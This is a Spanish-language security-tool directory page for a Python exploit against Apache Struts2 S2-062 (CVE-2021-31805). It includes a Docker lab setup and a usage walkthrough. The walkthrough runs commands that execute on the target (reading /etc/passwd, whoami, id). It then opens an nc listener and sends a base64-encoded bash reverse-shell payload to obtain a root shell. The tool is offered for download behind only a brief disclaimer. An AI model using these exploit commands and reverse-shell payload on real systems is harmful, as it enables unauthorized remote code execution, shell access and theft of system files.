Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Struts2_S2-062_CVE-2021-31805 — Exploit en Python para Apache Struts2 S2-062 (CVE-2021-31805) ejecución remota de código, con entorno de reproducción basado en Docker y generación de payload de shell inversa. | Kitploit
Herramientas/GitHubGitHub/secnn/struts2_s2-062_cve-2021-31805
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubsecnn/struts2_s2-062_cve-2021-31805

Struts2_S2-062_CVE-2021-31805

Exploit en Python para Apache Struts2 S2-062 (CVE-2021-31805) ejecución remota de código, con entorno de reproducción basado en Docker y generación de payload de shell inversa.

Ver Repositorio
115hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Struts2_S2-062_CVE-2021-31805

Vulnerabilidad de ejecución remota de código en Apache Struts2 S2-062 (CVE-2021-31805) | Reverse Shell

Entorno de reproducción de la vulnerabilidad

docker-compose.yml

root@kitploit:~
version: '2'
services:
 struts2:
   image: vulhub/struts2:2.5.25
   ports:
    - "8080:8080"

Extraer la imagen e iniciar el entorno

root@kitploit:~
docker-compose up -d

Dirección de acceso: http://1.1.1.1:8080

Script de verificación de la vulnerabilidad

root@kitploit:~
python Struts2_S2-062_CVE-2021-31805.py http://1.1.1.1:8080/index.action "cat /etc/passwd"

passwd

root@kitploit:~
python Struts2_S2-062_CVE-2021-31805.py http://1.1.1.1:8080/index.action whoami

root

root@kitploit:~
python Struts2_S2-062_CVE-2021-31805.py http://1.1.1.1:8080/index.action id

id

Reverse Shell

NC abre el puerto en modo escucha

root@kitploit:~
nc -lvvp 8081

NC

Construir el script de reverse shell codificado en base64, generado con el siguiente sitio web: https://ir0ny.top/pentest/reverse-encoder-shell.html base64

Obtener la Shell

root@kitploit:~
python CVE-2021-31805_Shell.py http://1.1.1.1:8080/index.action "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvODA4MCAwPiYx}|{base64,-d}|{bash,-i}"

shell

Shell obtenida con éxito

Shell_code

Aviso legal

No utilice esto con fines ilegales, únicamente para pruebas de seguridad; de lo contrario, las consecuencias no están relacionadas con este proyecto. Nota: pruebe los sitios web solo con la debida autorización: hackear sitios sin permiso, lágrimas para tus seres queridos.

Descargar herramienta